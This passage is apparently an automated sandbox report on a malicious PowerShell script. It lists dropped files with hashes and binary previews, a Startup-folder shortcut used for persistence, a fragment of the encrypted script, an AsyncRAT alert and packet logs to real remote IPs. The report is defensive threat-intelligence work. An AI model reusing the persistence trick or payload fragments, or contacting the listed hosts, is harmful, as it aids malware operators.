Size (bytes):	204
Entropy (8bit):	5.084773201763043
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2wkn23f4sfzB0zxszIwkn23f4sfzQA:p37L/6KRf310Qf3EA
MD5:	0C540B653C235849DF11B922468502AC
SHA1:	4E9F25204D9073244B84F7C5DCA3DACFF2FE2EB2
SHA-256:	0F52CA4388DD25EC69AB47E6995DB5926F35AA00B73F3715D922C772478D28C7
SHA-512:	7C894A07CFA68D05403BADE33FEDACFE30BCF47631791E4E0C704845C48ED53414241E975DEEF89E0456F84B7D1388A3C726B9A46CBE462EF3AD187B203786E7
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.0.cs"

C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.630181966111448
Encrypted:	false
SSDEEP:	192:ERH6HN4QhfNQ8q8888yYAdsRjOaDUxRa95MqBYHeN45L:PNxNs9O0+a95MqvS5L
MD5:	0F93B6685A10E955391B9C9511FAC996
SHA1:	D7D11385CABDC1225598F2A2C4064CB5CFFB9529
SHA-256:	2FE4F3047DA49D2F8C0CC355BFAE249A2B818611CC1D3C8A9734A03A49522565
SHA-512:	3834BCD6E25DE597799C02BDF21CC597B4B8686B4D2EF630CC64418D70E98DE1876BE221F0BCA2F02260FFFF7468A88BFD4BDF01E627694532C0D4D60FE01C2A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vg...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	702
Entropy (8bit):	5.2357519677798114
Encrypted:	false
SSDEEP:	12:KJN/qR37L/6KRf310Qf3E1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRf31nf32Kax5DqBVKVrdFAMb
MD5:	87A57A108F3707384C2561D386C85DAD
SHA1:	A328E1DE67AD3AC45C652612C2CECDBEB93F3196
SHA-256:	9C715E312F9B51E648AC4D35807E5FDBFC2274790FADCB084D9335E2C0E7BD54
SHA-512:	0795578E07F36CA33677602A14866800F3104D160D5310FA635B9E5EF305328C8F0F9FC56D986A23D314F06BCA13953B363F1F62626A2289673EB8A737EFD1E8
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.73855177285171
Encrypted:	false
SSDEEP:	48:x5skSkXLPr3C4U28QjQukvhkvklCywWmdsYlDl1hSogZodMYlDl1hSogZoJ1:AqX33CxHQVkvhkvCCtyYlDwHtYlDwHe
MD5:	F9529238409C3DDB6B5C7C7C97A7FDAA
SHA1:	BE2D577EE4E89399E240B9A33DC8E931AC0BD8E0
SHA-256:	1AD76C9241BF83D9C3C3DD054A24CDD340011DC423B3577294E72B3F8359EA25
SHA-512:	970C0DBD2BE020790E269358190929CD0BCA812C5DEFACCF558F6FF7FBCBE0F3460BFC2DAF216DBE22745F425CDC84D5246A6CB0B1B214DA35B9C7F65562F3D4
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v........A]..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........A]..Y.&.A]......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^"Z.............................%..A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......CW.^"Z.............................F..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^"Z............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................>..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^"Z......Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PPLRACMLDGU2IJ701KSD.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.73855177285171
Encrypted:	false
SSDEEP:	48:x5skSkXLPr3C4U28QjQukvhkvklCywWmdsYlDl1hSogZodMYlDl1hSogZoJ1:AqX33CxHQVkvhkvCCtyYlDwHtYlDwHe
MD5:	F9529238409C3DDB6B5C7C7C97A7FDAA
SHA1:	BE2D577EE4E89399E240B9A33DC8E931AC0BD8E0
SHA-256:	1AD76C9241BF83D9C3C3DD054A24CDD340011DC423B3577294E72B3F8359EA25
SHA-512:	970C0DBD2BE020790E269358190929CD0BCA812C5DEFACCF558F6FF7FBCBE0F3460BFC2DAF216DBE22745F425CDC84D5246A6CB0B1B214DA35B9C7F65562F3D4
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v........A]..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v........A]..Y.&.A]......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^"Z.............................%..A.p.p.D.a.t.a...B.V.1....."Z....Roaming.@......CW.^"Z.............................F..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^"Z............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................>..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^"Z......Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:///C:\Windows\Temp\Package.exe>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.981292305417088
Encrypted:	false
SSDEEP:	3:HRAbABGQYm5sMsgSE:HRYFVmyMsVE
MD5:	023F236CBD84BD3887E1186F9DE7359E
SHA1:	B7F015A8775C701D8F281541FDBF4B4A605C6070
SHA-256:	26F16FF4B0A1FED15960BA8E5EAB8DDB403265F8BB39AAED310A06998333CFF2
SHA-512:	327EC237DB8AC9C0BA6FC13738B08B73AC1BA3268BF967DF5AEA37DADC03FDB4E1FF75893FA276D08137CE4C9243BCFB2E0B199BC58B7B1A1BD076D6EFE3E6BC
Malicious:	true
Preview:	[InternetShortcut]..URL=file:///C:\Windows\Temp\Package.exe..

C:\Windows\Temp\Package.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	206304
Entropy (8bit):	5.9403786086887225
Encrypted:	false
SSDEEP:	3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
MD5:	2696D944FFBEF69510B0C826446FD748
SHA1:	E4106861076981799719876019FE5224EAC2655C
SHA-256:	A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
SHA-512:	C286BC2DA757CBB2A28CF516A4A273DD11B15F674D5F698A713DC794F013B7502A8893AB6041E51BAB3CDD506A18C415B9DF8483B19E312F8FCB88923F42B8EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2 ps1.ps1, Detection: malicious, Browse Filename: script.ps1, Detection: malicious, Browse Filename: script.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s..u...u...u.......u.......u...u...w.......u.......u......u.......u..Rich.u..........PE..L...........................................0....@..........................0......&G....@... .............................tH.......`...................!............T...........................H...@............@..l............................text...T........................... ..`.data...t....0......................@....idata..,....@......."..............@..@.rsrc........`.......@..............@..@.reloc..........,..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\iviewers.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.329772980958026
Encrypted:	false
SSDEEP:	1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
MD5:	33AE2B9C3E710254FE2E2CE35FF8A7C8
SHA1:	109E32187254B27E04EF18BBE1B48FAD42BCA841
SHA-256:	9C2838E120C7ED5B582BEDC6177F14A52AA578ADEEA269D0F96FC71A95BD6E68
SHA-512:	2ABE017E2F1D29FE789206D6483B9B33E7ABD0871300D678EABA15E390D55C5E197D6CEA6EA32DFDEE5F65D082574ADCC192A4FC0C9506BBBA8AD7E957E12599
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: 2 ps1.ps1, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x%S;.K.;.K.;.K.paH.1.K.paN...K.paO./.K.=.N.$.K.=.O.*.K.=.H./.K.paJ.8.K.;.J.n.K.V.B.:.K.V.K.:.K.V...:.K.V.I.:.K.Rich;.K.........PE..L....rvg...........!...&............c.....................................................@..........................J..T...$K..(...............................,....>..p............................=..@............... ............................text............................... ..`.rdata...a.......b..................@..@.data...<....`.......D..............@....rsrc................N..............@..@.reloc..,............P..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46598610136999
Encrypted:	false
SSDEEP:	6144:wIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSbl:VXD94+WlLZMM6YFHv+l
MD5:	57A5B19C430EAAF09C8F54B1E074FA52
SHA1:	0BEF7DA82DB2DEAC2C5199B89E7DF5D92E24D529
SHA-256:	372337C3A8F2904B4425B56CDD7DE06F24C1B86D80A48DA18F3A912B125D471F
SHA-512:	7649DD34B72A0B5BAE342F0D84D217E774444B74A7C4D9FC55945AB7E644127D115B67D6B123F075730E47B167394B6C939BB816FCEAAD7F0C6E33D4FC20287C
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.e..A]..............................................................................................................................................................................................................................................................................................................................................U...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (1483), with CRLF line terminators
Entropy (8bit):	6.129714371369089
TrID:
File name:	wrcaf.ps1
File size:	2'469 bytes
MD5:	898d5189a1dc57fa7a80b4d986ef77c9
SHA1:	aeb3667119b2fda564f498d26c04758caf44b1c5
SHA256:	61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
SHA512:	d8cc4add28939f7072fad657b863f0e49ae420bae27a952db499f66caebbda79ff29a552f12ef0cd2cbd1d32003c0db940f0a16bceca196cd3684472c0c2e8c8
SSDEEP:	48:ckoSb0VoVBvN4nybpaHqQZvac7Pz8CrkkdmIR+BWRBG5xc70kACG8AR:ckoSuIinyV2VrH5ijcXa
TLSH:	7251C79A3B9FF4B695A294D4152BD540C368901231158E95BFCEC3807BB26ECA07E1C9
File Content Preview:	..$J3Vpk = 'Ii0RTbGzzUEvyNo4Bv3+565asnue7QdcfECUULWc5v0='..$fTMhG = 'TIjY+mCoyqr/Ui69B6r26g=='..$75WTR = 'pjKplnb2olOyWRmFf+Q/sPPyC3lEOLIGOf1BHcNgLqGh1KjmGH2Wge6bfFoc02/thXk8AOGRuA37/MqZgUMe5O3QfRgaf2U/77qZvx6xzYjVwpqmZCUbcIrdIPhA9UP/vAP14IqX/XQKBfEFss038

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T19:13:09.179501+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	157.20.182.177	4449	192.168.2.4	49732	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 19:12:58.329485893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:58.334331036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:58.334419012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:58.337635994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:58.342421055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002113104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002131939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002145052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002197027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.002545118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002556086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002566099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002577066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002602100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.002635002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.002820015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002830029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002840042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.002878904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.002898932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.007225990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.007527113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.007538080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.007549047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.007582903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.090703011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.090712070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.090773106 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.090780020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.090797901 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.090831995 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.095555067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.095566988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.095576048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.095586061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.095594883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.095611095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.095629930 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.100305080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.100316048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.100325108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.100334883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.100344896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.100356102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.100380898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.105031967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.105043888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.105053902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.105063915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.105072975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.105099916 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.105120897 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.109869957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.109883070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.109891891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.109901905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.109911919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.109929085 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.109955072 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.114554882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.114566088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.114574909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.114610910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.164268970 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.179740906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.179754019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.179761887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.179770947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.179804087 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.179824114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.185384989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.185529947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.185540915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.185550928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.185590029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.191045046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191056967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191066027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191075087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191085100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191095114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.191112041 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.191138983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.196629047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.196640015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.196647882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.196656942 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.196666002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.196686983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.196706057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.202246904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.202258110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.202265978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.202275991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.202284098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.202301979 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.202318907 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.202333927 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.207798958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.207809925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.207818031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.207828045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.207856894 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.207870960 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213042974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213057995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213067055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213077068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213112116 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213124037 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213186026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213195086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213215113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213223934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213232040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213233948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213243008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213252068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213258982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213263035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213273048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213279963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213282108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213291883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213300943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213309050 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213310003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213320971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213325977 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213331938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.213360071 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.213360071 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.258013010 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.269475937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269488096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269495964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269506931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269525051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.269553900 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.269640923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269671917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269717932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.269799948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269871950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269881964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269891024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.269936085 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.269969940 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.270347118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270363092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270375013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270385981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270396948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270404100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.270406961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.270437002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.270452023 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.271142960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271229029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271239996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271250010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271264076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271270990 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.271275043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.271280050 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.271373987 CET	49730	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:12:59.272136927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 2, 2025 19:12:59.272146940 CET	80	49730	147.45.44.131	192.168.2.4
